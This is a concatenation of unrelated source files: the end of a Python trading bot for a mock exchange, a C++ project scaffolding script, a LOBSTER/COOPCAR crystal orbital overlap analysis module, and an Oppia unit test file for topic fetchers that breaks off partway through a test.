#buy_stock(xlf_buy_price, 100 - inventory["XLF"], "XLF")
#sell_stock(xlf_sell_price, int(inventory["XLF"]/3), "XLF")
def update_stock_values(message): # GS, MS, WFC, BOND
symbol = message['symbol']
market_sell_prices = message["sell"]
market_buy_prices = message["buy"]
if len(market_sell_prices) < 1 or len(market_buy_prices) < 1:
return
lowest_sell = market_sell_prices[0][0]
lowest_sell_amount = market_sell_prices[0][1]
highest_buy = market_buy_prices[0][0]
highest_buy_amount = market_sell_prices[0][1]
recent_buy_prices[symbol] = highest_buy
recent_sell_prices[symbol] = lowest_sell
recent_buy_amounts[symbol] = highest_buy_amount
recent_sell_amounts[symbol] = lowest_sell_amount
def parse_fill(message):
amount = message['size']
symbol = message['symbol']
if message['dir'] == 'SELL':
amount *= -1
inventory[symbol] += amount
# ~~~~~============== MISC ==============~~~~~
#shows-availability-introduction-estimate
# returns t/f if symbol is valid
def validate_symbol(symbol):
return symbol in symbols
def check_recents():
return recent_buy_prices['BOND'] != 0 and recent_buy_prices['GS'] != 0 and recent_buy_prices['MS'] != 0 and recent_buy_prices['WFC'] != 0 \
and recent_sell_prices['BOND'] != 0 and recent_sell_prices['GS'] != 0 and recent_sell_prices['MS'] != 0 and recent_sell_prices['WFC'] != 0 \
and recent_buy_amounts['BOND'] != 0 and recent_buy_amounts['GS'] != 0 and recent_buy_amounts['MS'] != 0 and recent_buy_amounts['WFC'] != 0 \
and recent_sell_amounts['BOND'] != 0 and recent_sell_amounts['GS'] != 0 and recent_sell_amounts['MS'] != 0 and recent_sell_amounts['WFC'] != 0
# ~~~~~============== MAIN LOOP ==============~~~~~
def main():
global exchange, order_id
# dictionary mapping 'stocks' to amount of each stock
global inventory
global symbols
global recent_sell_prices, recent_buy_prices, recent_buy_amounts, recent_sell_amounts
recent_sell_prices = {'BOND':0, 'GS':0, 'MS':0, 'WFC':0, 'XLF':0}
recent_buy_prices = {'BOND':0, 'GS':0, 'MS':0, 'WFC':0, 'XLF':0}
recent_sell_amounts = {'BOND':0, 'GS':0, 'MS':0, 'WFC':0, 'XLF':0}
recent_buy_amounts = {'BOND':0, 'GS':0, 'MS':0, 'WFC':0, 'XLF':0}
order_id = 0
inventory = {'BOND':0, 'VALBZ':0, 'VALE':0, 'GS':0, 'MS':0, 'WFC':0, 'XLF':0}
symbols = set(['BOND', 'VALBZ', 'VALE', 'GS', 'MS', 'WFC', 'XLF'])
exchange = connect()
write_to_exchange(exchange, {"type": "hello", "team": team_name.upper()})
hello_from_exchange = read_from_exchange(exchange)
# A common mistake people make is to call write_to_exchange() > 1
# time for every read_from_exchange() response.
# Since many write messages generate marketdata, this will cause an
# exponential explosion in pending messages. Please, don't do that!
print("The exchange replied:", hello_from_exchange, file=sys.stderr)
while True:
msg = read_from_exchange(exchange)
print("The exchange replied:", msg, file=sys.stderr)
parse_message(msg)
def generate_order_id():
global order_id
order_id = order_id + 1
if __name__ == "__main__":
main ()
|
#!/usr/bin/env python
import argparse
import pathlib
from collections import defaultdict
DEFAULT_CPP_VERSION = '20'
SRC_CMAKE_NAME = 'CMakeLists-default'
DEST_CMAKE_NAME = 'CMakeLists.txt'
SRC_MAIN_NAME = 'main-default'
DEST_MAIN_NAME = 'main.cpp'
def create_directories(proj):
p = pathlib.Path(__file__).parent
root_dir = p / proj
build_dir = root_dir / 'build'
if not root_dir.exists():
root_dir.mkdir()
if not build_dir.exists():
build_dir.mkdir()
def create_cmake(proj):
current_path = pathlib.Path(__file__).parent
src_cmake = current_path / SRC_CMAKE_NAME
dest_cmake = current_path / proj / DEST_CMAKE_NAME
src_cmake_data = ''
with open(str(src_cmake), 'r') as file:
src_cmake_data = file.read()
src_cmake_data = src_cmake_data.format_map(defaultdict(str,
project_name =proj,
cpp_version=DEFAULT_CPP_VERSION,
CMAKE_PROJECT_NAME="{CMAKE_PROJECT_NAME}"
))
dest_cmake.touch()
dest_cmake.write_text(src_cmake_data)
def create_main(proj):
current_path = pathlib.Path(__file__).parent
src_main = current_path / SRC_MAIN_NAME
dest_main = current_path / proj / DEST_MAIN_NAME
src_main_data = ''
with open(str(src_main), 'r') as file:
src_main_data = file.read()
dest_main.touch()
dest_main.write_text(src_main_data)
parser = argparse.ArgumentParser(description='Create new coding sample directory.')
parser.add_argument('project', help='Directory name')
args = parser.parse_args()
create_directories(args.project)
create_cmake(args.project)
create_main(args.project)
|
# -*- coding: utf-8 -*-
"""
Created on Tue May 19 22:28:09 2020
@author: lansf
"""
from __future__ import absolute_import, division, print_function
import os
import pkg_resources
import numpy as np
from ase.io import read
from .vasp_dos import VASP_DOS
from .coordination import Coordination
import itertools
from scipy.ndimage import gaussian_filter1d
def write_lobsterin(directory='.', adsorbate_atoms=['C','H','O','N']
,basisSet='pbeVaspFit2015'
, basisfunctions={'C':'2s 2p', 'O':'2s 2p'
, 'N':'2s 2p', 'H':'1s'
,'Pt':'5d 6s'}
, gaussianSmearingWidth=0.003):
""" Write a lobster input file
Parameters
----------
directory : str
directory to write the lobsterin file. Must also contain a CONTCAR and
DOSCAR file
adsorbate_atoms : list[str or int]
adsorbate atom symbols or indices
basisSet : str
basis used to projected density onto orbitals
basisfunctions : dict
dictionary of atomic symbols and corresponding basis functions
gaussianSmearingWidth : float
float if Gaussian smearing is used. If tetrahedron method is used then
set to None
"""
if type(adsorbate_atoms[0]) == str:
CONTCAR = read(os.path.join(directory,'CONTCAR'))
all_symbols = CONTCAR.get_chemical_symbols()
adsorbate_indices = np.arange(len(all_symbols))[np.isin(all_symbols,adsorbate_atoms)]
else:
adsorbate_indices = adsorbate_atoms
CN = Coordination(CONTCAR,exclude=adsorbate_indices,cutoff=1.25)
bonded = CN.get_bonded()
site_indices = []
for i in adsorbate_indices:
site_indices += bonded[i]
site_indices = list(set(site_indices))
atom_pairs = []
for site_index in site_indices:
for adsorbate_index in adsorbate_indices:
atom_pairs.append((site_index, adsorbate_index))
atom_pairs += list(itertools.combinations(adsorbate_indices,2))
atom_pairs = np.array(atom_pairs) + 1
DOSCAR = os.path.join(directory,'DOSCAR')
DOS = VASP_DOS(DOSCAR)
COHPstartEnergy = DOS.emin - DOS.e_fermi
COHPendEnergy = DOS.emax - DOS.e_fermi
COHPSteps = int(DOS.ndos - 1)
basisSet = basisSet
basisfunctions = basisfunctions
gaussianSmearingWidth = gaussianSmearingWidth
file_name = os.path.join(directory,'lobsterin')
file = open(file_name,'w')
file.write('COHPstartEnergy ' + str(COHPstartEnergy))
file.write('\n')
file.write('COHPendEnergy ' + str(COHPendEnergy))
file.write('\n')
file.write('COHPSteps ' + str(COHPSteps))
file.write('\n')
file.write('basisSet ' + str(basisSet))
file.write('\n')
if gaussianSmearingWidth is not None:
file.write('gaussianSmearingWidth ' + str(gaussianSmearingWidth))
file.write('\n')
for key in basisfunctions.keys():
file.write('basisfunctions ' + key + ' ' + basisfunctions[key])
file.write('\n')
for pair in atom_pairs:
file.write('cohpbetween ' + 'atom ' + str(pair[0]) + ' atom ' + str(pair[1]))
file.write('\n')
file.close()
def get_example_data():
""" Get default path to experimental crystal ovelap populaiton data
Returns
-------
data_path : str
path to example lobster data
"""
data_path = pkg_resources.resource_filename(__name__, 'data/lobster')
return data_path
def get_all_lobster_files(directory, file_type='COOPCAR.lobster'):
""" Get all DOSCAR and CONTCAR file paths
Parameters
----------
directory : str
root directory to look for DOSCAR files
file_type : string
file type for which to search and return file path
Returns
-------
lobster_files : list[str]
list of paths to lobster files of type file_type
"""
lobster_directories = [os.path.join(r,subdirectory) for r,d,f in os.walk(directory)
for subdirectory in d
if file_type in os.listdir(os.path.join(r,subdirectory))]
lobster_files = [os.path.join(d,file_type) for d in lobster_directories]
return lobster_files
def get_bonding_states(orbital_indices, dos_energies, pcoop, pcoop_energies\
, set_antibonding_zero=False, emax=float('inf')):
""" method for obtaining bonding fraction of dos or dos-like array
Parameters
----------
orbital_indices : list[list]
list of orbital indices for each molecular orbital
dos_energies : numpy.ndarray
energies at which dos is calculated
pcoop : numpy.ndarray
projected orbital overlap populations
pcoop_energies : numpy.ndarray
energies at which the pcoop is calculated
set_antibonding_zero : bool
if true, set antibonding populations to zero to look at total
instead of net bonding characteristics
Returns
-------
dos_bonding : numpy.ndarray
1-D array of the relative bonding for either dos-like array
"""
if set_antibonding_zero == True:
pcoop[pcoop[...] < 0] = 0
pcoop = np.interp(dos_energies, pcoop_energies,pcoop)
pcoop[dos_energies[...] > emax] = 0
dos_bonding = []
for i in range(len(orbital_indices)):
dos_bonding.append(np.trapz(pcoop[orbital_indices[i]],dos_energies[orbital_indices[i]]))
return dos_bonding
class OVERLAP_POPULATION:
"""Class for analyzing overlap population bonding data
Parameters
----------
file_name : str
full lobster file location
Attributes
----------
emax : float
maximum energy level
emin : float
minimum energy level
ndos : int
number of descritized energy levels
e_fermi : float
highest occupied energy level
is_spin : bool
indicates if projected density is spin resolved
num_interactions : int
number of interactions in COOP
interactions : list[str]
list of the interactions included in the file
"""
def __init__(self, file_name="COOPCAR.lobster"):
#conditional read statements can be added
num_interactions, interactions, is_spin, ndos, e_fermi, e_min, e_max\
= self._read_coopcar(file_name=file_name)
self.num_interactions = num_interactions
self.interactions = interactions
self.is_spin = is_spin
self.ndos = ndos
self.e_fermi = e_fermi
self.e_min = e_min
self.e_max = e_max
def apply_gaussian_filter(self, sigma):
"""Applies Gaussian filter to self._pcoop
Parameters
----------
sigma : float
standard deviation of Gaussian Kernel
Attributes
----------
_pcoop_original : numpy.ndarray
self._pcoop array without filter
Notes
-----
Understand carefully what this does before using it. It applies a
Gaussian filter to the average and integrated PCOOP and the PCOOP
such that the average and integrated PCOOP may become meaningless
"""
pcoop_exists = False
try:
self._pcoop
pcoop_exists = True
try:
self._pcoop_original
except:
self._pcoop_original = self._pcoop.copy()
except:
pass
if pcoop_exists == True:
self._pcoop[1:,:] = gaussian_filter1d(self._pcoop_original[1:,:].copy(), sigma)
def get_energies(self):
""" method for obtaining energy levels
Returns
-------
energies : numpy.ndarray
1-D array of energies
"""
energies = self._pcoop[0,:].copy()
return energies
def get_average_pcoop(self, sum_spin=True):
""" obtain average overlap population for all atom pairs
Parameters
----------
sum_spin : bool
indicates whether data of different spins should be summed
Returns
-------
average_pcoop : numpy.ndarray
1-D or 2-D array of average pcoop for all interactions
"""
is_spin = self.is_spin
num_interactions = self.num_interactions
_pcoop = self._pcoop
if is_spin == True:
if sum_spin == False:
average_pcoop = _pcoop[[1, 2 * num_interactions + 3], :]
else:
average_pcoop = _pcoop[1, :] + _pcoop[2 * num_interactions + 3, :]
else:
average_pcoop = _pcoop[1, :]
return average_pcoop
def get_average_int_pcoop(self, sum_spin=True):
"""obtain average integrated overlap population for all atom pairs
Parameters
----------
sum_spin : bool
indicates whether data of different spins should be summed
Returns
-------
average_int_pcoop : numpy.ndarray
1-D or 2-D array of average integrated pcoop for all interactions
"""
is_spin = self.is_spin
num_interactions = self.num_interactions
_pcoop = self._pcoop
if is_spin == True:
if sum_spin == False:
average_int_pcoop = _pcoop[[2, 2 * num_interactions + 4], :]
else:
average_int_pcoop = _pcoop[2, :] + _pcoop[2 * num_interactions + 4, :]
else:
average_int_pcoop = _pcoop[2, :]
return average_int_pcoop
def get_integrated_pcoop(self, interactions=[], sum_pcoop=False, sum_spin=True
, set_antibonding_zero=False):
""" obtain integrated projected crystal orbital overlap populations
Parameters
----------
interactions : list
indices of interactions for which to find the integrated pcoop
sum_pcoop : bool
indicates whether all pcoop should be summed
sum_spin : bool
indicates whether data of different spins should be summed
set_antibonding_zero : bool
if true, set antibonding populations to zero to look at total
instead of net bonding characteristics
Returns
-------
integrated_pcoop : numpy.ndarray
1-D, 2-D, or 3-D array of integrated pcoop for all interactions
"""
is_spin = self.is_spin
num_interactions = self.num_interactions
_pcoop = self._pcoop.copy()
if len(interactions) == 0:
interactions = list(range(num_interactions))
if is_spin == True:
spin_up = _pcoop[4:2 * num_interactions + 3:2, :][interactions]
spin_down = _pcoop[2 * num_interactions + 6::2, :][interactions]
if set_antibonding_zero == True:
spin_up[spin_up[...] < 0] = 0
spin_down[spin_down[...] < 0] = 0
if sum_spin == True:
integrated_pcoop = spin_up + spin_down
else:
integrated_pcoop = np.array([spin_up, spin_down])
else:
integrated_pcoop = _pcoop[4::2, :][interactions]
if set_antibonding_zero == True:
integrated_pcoop[integrated_pcoop[...] < 0] = 0
if sum_pcoop == True or len(interactions) == 1:
axis = len(integrated_pcoop.shape) - 2
integrated_pcoop = integrated_pcoop.sum(axis=axis)
return integrated_pcoop
def get_pcoop(self, interactions=[], sum_pcoop=False, sum_spin=True
, set_antibonding_zero=False):
""" method for obtaining projected crystal orbital overlap populations
Parameters
----------
interactions : list
indices of interactions for which to find the integrated pcoop
sum_pcoop : bool
indicates whether all pcoop should be summed
sum_spin : bool
indicates whether data of different spins should be summed
set_antibonding_zero : bool
if true, set antibonding populations to zero to look at total
instead of net bonding characteristics
Returns
-------
pcoop : numpy.ndarray
1-D or 2-D array of pcoop for all interactions
"""
is_spin = self.is_spin
num_interactions = self.num_interactions
_pcoop = self._pcoop.copy()
if len(interactions) == 0:
interactions = list(range(num_interactions))
if is_spin == True:
spin_up = _pcoop[3:2 * num_interactions + 3:2, :][interactions]
spin_down = _pcoop[2 * num_interactions + 5::2, :][interactions]
if set_antibonding_zero == True:
spin_up[spin_up[...] < 0] = 0
spin_down[spin_down[...] < 0] = 0
if sum_spin == True:
pcoop = spin_up + spin_down
else:
pcoop = np.array([spin_up, spin_down])
else:
pcoop = _pcoop[3::2, :][interactions]
if set_antibonding_zero == True:
pcoop[pcoop[...] < 0] = 0
if sum_pcoop == True or len(interactions) == 1:
axis = len(pcoop.shape) - 2
pcoop = pcoop.sum(axis=axis)
return pcoop
def _read_coopcar(self, file_name="COOPCAR.lobster"):
"""Read lobster COOPCAR and extract projected overlap
Parameters
----------
file_name : str
file location of the COOPCAR.lobster file file
Attributes
----------
_pcoop : numpy.ndarray
numpy array that contains the energy of levels and the projected
crystal orbital overlap population densities
Returns
-------
emax : float
maximum energy level
emin : float
minimum energy level
ndos : int
number of descritized energy levels
e_fermi : float
highest occupied energy level
is_spin : bool
indicates if projected density is spin resolved
num_interactions : int
number of interactions in COOP
interactions : list[str]
list of the interactions included in the file
"""
f = open(file_name)
f.readline() #skip the first line
descriptive_line = f.readline().split()
num_interactions = int(descriptive_line[0]) - 1
is_spin = int(descriptive_line[1])
if is_spin == 2:
is_spin = True
else:
is_spin = False
ndos = int(descriptive_line[2])
e_fermi = float(descriptive_line[5])
e_min = float(descriptive_line[3])
e_max = float(descriptive_line[4])
f.readline() #skip the line saying average
interactions = []
for i in range(num_interactions):
interactions += f.readline().split()
line = f.readline().split()
pcoop = np.zeros((ndos,len(line)))
pcoop[0] = np.array(line)
for nd in range(1,ndos):
line = f.readline().split()
pcoop[nd] = np.array(line)
pcoop = pcoop.T
pcoop[0] += e_fermi
self._pcoop = pcoop
return num_interactions, interactions, is_spin, ndos, e_fermi, e_min, e_max
def get_bonding_states(self, orbital_indices, dos_energies\
, interactions=[], set_antibonding_zero=False
, emax=float('inf')):
""" method for obtaining bonding fraction of dos or dos-like array
Parameters
----------
orbital_indices : list[list]
list of energy indices for each molecular orbital
dos_energies : numpy.ndarray
energies at which dos is calculated
interactions : list
indices of interactions for which to find the integrated pcoop
set_antibonding_zero : bool
if true, set antibonding populations to zero to look at total
instead of net bonding characteristics
emax : float
maximum energy level
Returns
-------
dos_bonding : numpy.ndarray
1-D array of the relative bonding for either dos-like array
"""
get_pcoop = self.get_pcoop
get_energies = self.get_energies
pcoop = get_pcoop(interactions=interactions, sum_pcoop=True, sum_spin=True
, set_antibonding_zero=set_antibonding_zero)
bonding_states = get_bonding_states(orbital_indices, dos_energies, pcoop
, get_energies()
, set_antibonding_zero=set_antibonding_zero
, emax = emax)
return bonding_states
|
# coding: utf-8
#
# Copyright 2018 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for topic domain objects."""
from __future__ import annotations
from core import feconf
from core.domain import topic_domain
from core.domain import topic_fetchers
from core.domain import topic_services
from core.domain import user_services
from core.platform import models
from core.tests import test_utils
from typing import List, Optional
MYPY = False
if MYPY: # pragma: no cover
from mypy_imports import topic_models
(topic_models,) = models.Registry.import_models([models.Names.TOPIC])
class MockTopicObject(topic_domain.Topic):
"""Mocks Topic domain object."""
@classmethod
def _convert_story_reference_v1_dict_to_v2_dict(
cls, story_reference: topic_domain.StoryReferenceDict
) -> topic_domain.StoryReferenceDict:
"""Converts v1 story reference dict to v2."""
return story_reference
class TopicFetchersUnitTests(test_utils.GenericTestBase):
"""Tests for topic fetchers."""
user_id: str = 'user_id'
story_id_1: str = 'story_1'
story_id_2: str = 'story_2'
story_id_3: str = 'story_3'
subtopic_id: int = 1
skill_id_1: str = 'skill_1'
skill_id_2: str = 'skill_2'
def setUp(self) -> None:
super().setUp()
self.TOPIC_ID = topic_fetchers.get_new_topic_id()
changelist = [topic_domain.TopicChange({
'cmd': topic_domain.CMD_ADD_SUBTOPIC,
'title': 'Title',
'subtopic_id': 1,
'url_fragment': 'sample-fragment'
})]
self.save_new_topic(
self.TOPIC_ID, self.user_id, name='Name',
abbreviated_name='name', url_fragment='name-one',
description='Description',
canonical_story_ids=[self.story_id_1, self.story_id_2],
additional_story_ids=[self.story_id_3],
uncategorized_skill_ids=[self.skill_id_1, self.skill_id_2],
subtopics=[], next_subtopic_id=1)
self.save_new_story(self.story_id_1, self.user_id, self.TOPIC_ID)
self.save_new_story(
self.story_id_3,
self.user_id,
self.TOPIC_ID,
title='Title 3',
description='Description 3')
self.signup('a@example.com', 'A')
self.signup('b@example.com', 'B')
self.signup(self.CURRICULUM_ADMIN_EMAIL, self.CURRICULUM_ADMIN_USERNAME)
self.user_id_a = self.get_user_id_from_email('a@example.com')
self.user_id_b = self.get_user_id_from_email('b@example.com')
self.user_id_admin = (
self.get_user_id_from_email(self.CURRICULUM_ADMIN_EMAIL))
topic_services.update_topic_and_subtopic_pages(
self.user_id_admin, self.TOPIC_ID, changelist, 'Added a subtopic')
self.topic: Optional[topic_domain.Topic] = (
topic_fetchers.get_topic_by_id(self.TOPIC_ID)
)
self.set_curriculum_admins([self.CURRICULUM_ADMIN_USERNAME])
self.set_topic_managers(
[user_services.get_username(self.user_id_a)], self.TOPIC_ID)
self.user_a = user_services.get_user_actions_info(self.user_id_a)
self.user_b = user_services.get_user_actions_info(self.user_id_b)
self.user_admin = user_services.get_user_actions_info(
self.user_id_admin)
def test_get_topic_from_model(self) -> None:
topic_model: Optional[topic_models.TopicModel] = (
topic_models.TopicModel.get(self.TOPIC_ID)
)
# Ruling out the possibility of None for mypy type checking.
assert topic_model is not None
topic: topic_domain.Topic = (
topic_fetchers.get_topic_from_model(topic_model)
)
# Ruling out the possibility of None for mypy type checking.
assert self.topic is not None
self.assertEqual(topic.to_dict(), self.topic.to_dict())
def test_get_topic_by_name(self) -> None:
topic: Optional[topic_domain.Topic] = (
topic_fetchers.get_topic_by_name('Name')
)
# Ruling out the possibility of None for mypy type checking.
assert topic is not None
self.assertEqual(topic.name, 'Name')
def test_raises_error_if_wrong_name_is_used_to_get_topic_by_name(
self
) -> None:
with self.assertRaisesRegex(
Exception,
'No Topic exists for the given topic name: wrong_topic_name'
):
topic_fetchers.get_topic_by_name('wrong_topic_name', strict=True)
def test_get_topic_rights_is_none(self) -> None:
fake_topic_id = topic_fetchers.get_new_topic_id()
fake_topic: Optional[topic_domain.TopicRights] = (
topic_fetchers.get_topic_rights(fake_topic_id, strict=False)
)
self.assertIsNone(fake_topic)
def test_get_topic_by_url_fragment(self) -> None:
topic: Optional[topic_domain.Topic] = (
topic_fetchers.get_topic_by_url_fragment('name-one')
)
# Ruling out the possibility of None for mypy type checking.
assert topic is not None
self.assertEqual(topic.url_fragment, 'name-one')
def test_get_all_topic_rights(self) -> None:
topic_rights = topic_fetchers.get_all_topic_rights()
topic_id_list = [self.TOPIC_ID]
for topic_key in topic_rights:
self.assertIn(topic_key, topic_id_list)
def test_get_canonical_story_dicts(self) -> None:
self.save_new_story(self.story_id_2, self.user_id, self.TOPIC_ID)
topic_services.publish_story(
self.TOPIC_ID, self.story_id_1, self.user_id_admin)
topic_services.publish_story(
self.TOPIC_ID, self.story_id_2, self.user_id_admin)
topic: Optional[topic_domain.Topic] = (
topic_fetchers.get_topic_by_id(self.TOPIC_ID)
)
# Ruling out the possibility of None for mypy type checking.
assert topic is not None
canonical_dict_list: List[topic_fetchers.CannonicalStoryDict] = (
topic_fetchers.get_canonical_story_dicts(self.user_id_admin, topic)
)
self.assertEqual(len(canonical_dict_list), 2)
story_dict_1: topic_fetchers.CannonicalStoryDict = {
'id': 'story_1',
'title': 'Title',
'description': 'Description',
'node_titles': [],
'thumbnail_bg_color': None,
'thumbnail_filename': None,
'url_fragment': 'title',
'topic_url_fragment': 'name-one',
'classroom_url_fragment': 'staging',
'story_is_published': True,
'completed_node_titles': [], 'all_node_dicts': []}
story_dict_2: topic_fetchers.CannonicalStoryDict = {
'id': 'story_2',
'title': 'Title',
'description': 'Description',
'node_titles': [],
'thumbnail_bg_color': None,
'thumbnail_filename': None,
'url_fragment': 'title',
'topic_url_fragment': 'name-one',
'classroom_url_fragment': 'staging',
'story_is_published': True,
'completed_node_titles': [], 'all_node_dicts': []}
story_dict_list = [story_dict_1, story_dict_2]
for canonical_story_dict in canonical_dict_list:
self.assertIn(canonical_story_dict, story_dict_list)
def test_get_all_topics(self) -> None:
topics = topic_fetchers.get_all_topics()
self.assertEqual(len(topics), 1)
# Ruling out the possibility of None for mypy type checking.
assert self.topic is not None
self.assertEqual(topics[0].id, self.topic.id)
def test_cannot_get_topic_from_model_with_invalid_schema_version(
self
) -> None:
topic_services.create_new_topic_rights('topic_id', self.user_id_a)
commit_cmd = topic_domain.TopicChange({
'cmd': topic_domain.CMD_CREATE_NEW,
'name': 'name'
})
subtopic_dict = {
'id': 1,
'title': 'subtopic_title',
'skill_ids': []
}
model = topic_models.TopicModel(
id='topic_id',
name='name',
abbreviated_name='abbrev',
url_fragment='name-two',
canonical_name='canonical_name',
description='description',
next_subtopic_id=1,
language_code='en',
subtopics=[subtopic_dict],
subtopic_schema_version=0,
story_reference_schema_version=0,
page_title_fragment_for_web='fragm'
)
commit_cmd_dicts = [commit_cmd.to_dict()]
model.commit(
self.user_id_a, 'topic model created', commit_cmd_dicts)
with self.assertRaisesRegex(
Exception,
'Sorry, we can only process v1-v%d subtopic schemas at '
'present.' % feconf.CURRENT_SUBTOPIC_SCHEMA_VERSION):
topic_fetchers.get_topic_from_model(model)
topic_services.create_new_topic_rights('topic_id_2', self.user_id_a)
model = topic_models.TopicModel(
id='topic_id_2',
name='name 2',
description='description 2',
abbreviated_name='abbrev',
url_fragment='name-three',
canonical_name='canonical_name_2',
next_subtopic_id=1,
language_code='en',
subtopics=[subtopic_dict],
subtopic_schema_version=1,
story_reference_schema_version=0,
page_title_fragment_for_web='fragm'
)
commit_cmd_dicts = [commit_cmd.to_dict()]
model.commit(
self.user_id_a, 'topic model created', commit_cmd_dicts)
with self.assertRaisesRegex(
Exception,
'Sorry, we can only process v1-v%d story reference schemas at '
'present.' % feconf.CURRENT_STORY_REFERENCE_SCHEMA_VERSION):
topic_fetchers.get_topic_from_model(model)
def test_topic_model_migration_to_higher_version(self) -> None:
topic_services.create_new_topic_rights('topic_id', self.user_id_a)
commit_cmd = topic_domain.TopicChange({
'cmd': topic_domain.CMD_CREATE_NEW,
'name': 'name'
})
subtopic_v1_dict = {
'id': 1,
'title': 'subtopic_title',
'skill_ids': []
}
model = topic_models.TopicModel(
id='topic_id',
name='name 2',
description='description 2',
abbreviated_name='abbrev',
url_fragment='name-three',
canonical_name='canonical_name_2',
next_subtopic_id=1,
language_code='en',
subtopics=[subtopic_v1_dict],
subtopic_schema_version=1,
story_reference_schema_version=1,
page_title_fragment_for_web='fragment'
)
commit_cmd_dicts = [commit_cmd.to_dict()]
model.commit(
self.user_id_a, 'topic model created', commit_cmd_dicts)
swap_topic_object = self.swap(topic_domain, 'Topic', MockTopicObject)
current_story_refrence_schema_version_swap = self.swap(
feconf, 'CURRENT_STORY_REFERENCE_SCHEMA_VERSION', 2)
with swap_topic_object, current_story_refrence_schema_version_swap:
topic: topic_domain.Topic = (
topic_fetchers.get_topic_from_model(model))
self.assertEqual(topic.story_reference_schema_version, 2)
def test_get_topic_by_id(self) -> None:
# Ruling out the possibility of None for mypy type checking.
assert self.topic is not None
expected_topic = self.topic.to_dict()
topic: Optional[topic_domain.Topic] = (
topic_fetchers.get_topic_by_id(self.TOPIC_ID)
)
# Ruling out the possibility of None for mypy type checking.
assert topic is not None
self.assertEqual(topic.to_dict(), expected_topic)
fake_topic_id = topic_fetchers.get_new_topic_id()
fake_topic: Optional[topic_domain.Topic] = (
topic_fetchers.get_topic_by_id(fake_topic_id, strict=False)
)
self.assertIsNone(fake_topic)
def test_get_topic_by_version(self) -> None:
topic_id = topic_fetchers.get_new_topic_id()
self.save_new_topic(
topic_id, self.user_id, name='topic name',
abbreviated_name='topic-name', url_fragment='topic-name',
description='Description', canonical_story_ids=[],
additional_story_ids=[], uncategorized_skill_ids=[],
subtopics=[], next_subtopic_id=1)
changelist = [topic_domain.TopicChange({
'cmd': topic_domain.CMD_UPDATE_TOPIC_PROPERTY,
'property_name': topic_domain.TOPIC_PROPERTY_LANGUAGE_CODE,
'old_value': 'en',
'new_value': 'bn'
})]
topic_services.update_topic_and_subtopic_pages(
self.user_id, topic_id, changelist, 'Change language code')
topic_v0: Optional[topic_domain.Topic] = (
topic_fetchers.get_topic_by_id(topic_id, version=0)
)
topic_v1: Optional[topic_domain.Topic] = (
topic_fetchers.get_topic_by_id(topic_id, version=1)
)
# Ruling out the possibility of None for mypy type checking.
assert topic_v0 is not None
assert topic_v1 is not None
self.assertEqual(topic_v1.language_code, 'en')
self.assertEqual(topic_v0.language_code, 'bn')
def test_get_topics_by_id(self) -> None:
# Ruling out the possibility of None for mypy type checking.
assert self.topic is not None
expected_topic = self.topic.to_dict()
topics: List[Optional[topic_domain.Topic]] = (
topic_fetchers.get_topics_by_ids([self.TOPIC_ID])
)
# Ruling out the possibility of None for mypy type checking.
assert topics[0] is not None
self.assertEqual(topics[0].to_dict(), expected_topic)
self.assertEqual(len(topics), 1)
topics = (
topic_fetchers.get_topics_by_ids([self.TOPIC_ID, 'topic'])
)
# Ruling out the possibility of None for mypy type checking.
assert topics[0] is not None
self.assertEqual(topics[0].to_dict(), expected_topic)
self.assertIsNone(topics[1])
self.assertEqual(len(topics), 2)
def test_raises_error_if_topics_fetched_with_invalid_ids_and_strict(
self
) -> None:
with self.assertRaisesRegex(
Exception,
'No topic model exists for the topic_id: invalid_id'
):
topic_fetchers.get_topics_by_ids(['invalid_id'], strict=True)
def test_get_all_topic_rights_of_user(self) -> None:
topic_rights: List[topic_domain.TopicRights] = (
topic_fetchers.get_topic_rights_with_user(self.user_id_a)
)
self.assertEqual(len(topic_rights), 1)
self.assertEqual(topic_rights[0].id, self.TOPIC_ID)
self.assertEqual(topic_rights[0].manager_ids, [self.user_id_a])
def test_commit_log_entry(self) -> None:
topic_commit_log_entry: (
Optional[topic_models.TopicCommitLogEntryModel]
) = (
topic_models.TopicCommitLogEntryModel.get_commit(
self.TOPIC_ID, 1
)
)
# Ruling out the possibility of None for mypy type checking.
assert topic_commit_log_entry is not None
self.assertEqual(topic_commit_log_entry.commit_type, 'create')
self.assertEqual(topic_commit_log_entry.topic_id, self.TOPIC_ID)
self.assertEqual(topic_commit_log_entry.user_id, self.user_id)
def test_get_all_summaries(self) -> None:
topic_summaries = topic_fetchers.get_all_topic_summaries()
self.assertEqual(len(topic_summaries), 1)
self.assertEqual(topic_summaries[0].name, 'Name')
self.assertEqual(topic_summaries[0].canonical_story_count, 0)
self.assertEqual(topic_summaries[0].additional_story_count, 0)
self.assertEqual(topic_summaries[0].total_skill_count, 2)
self.assertEqual(topic_summaries[0].uncategorized_skill_count, 2)
self.assertEqual(topic_summaries[0].subtopic_count, 1)
def test_get_multi_summaries(self) -> None:
topic_summaries: List[Optional[topic_domain.TopicSummary]] = (
topic_fetchers.get_multi_topic_summaries([
self.TOPIC_ID, 'invalid_id'
])
)
# Ruling out the possibility of None for mypy type checking.
assert topic_summaries[0] is not None
self.assertEqual(len(topic_summaries), 2)
self.assertEqual(topic_summaries[0].name, 'Name')
self.assertEqual(topic_summaries[0].description, 'Description')
self.assertEqual(topic_summaries[0].canonical_story_count, 0)
self.assertEqual(topic_summaries[0].additional_story_count, 0)
self.assertEqual(topic_summaries[0].total_skill_count, 2)
self.assertEqual(topic_summaries[0].uncategorized_skill_count, 2)
self.assertEqual(topic_summaries[0].subtopic_count, 1)
self.assertIsNone(topic_summaries[1])
def test_get_published_summaries(self) -> None:
# Unpublished topics should not be returned.
topic_summaries = topic_fetchers.get_published_topic_summaries()
self.assertEqual(len(topic_summaries), 0)
old_value: List[str] = []
# Publish the topic.
changelist = [topic_domain.TopicChange({
'cmd': topic_domain.CMD_MOVE_SKILL_ID_TO_SUBTOPIC,
'old_subtopic_id': None,
'new_subtopic_id': self.subtopic_id,
'skill_id': self.skill_id_1
}), topic_domain.TopicChange({
'cmd': topic_domain.CMD_UPDATE_TOPIC_PROPERTY,
'property_name': (
topic_domain.TOPIC_PROPERTY_SKILL_IDS_FOR_DIAGNOSTIC_TEST),
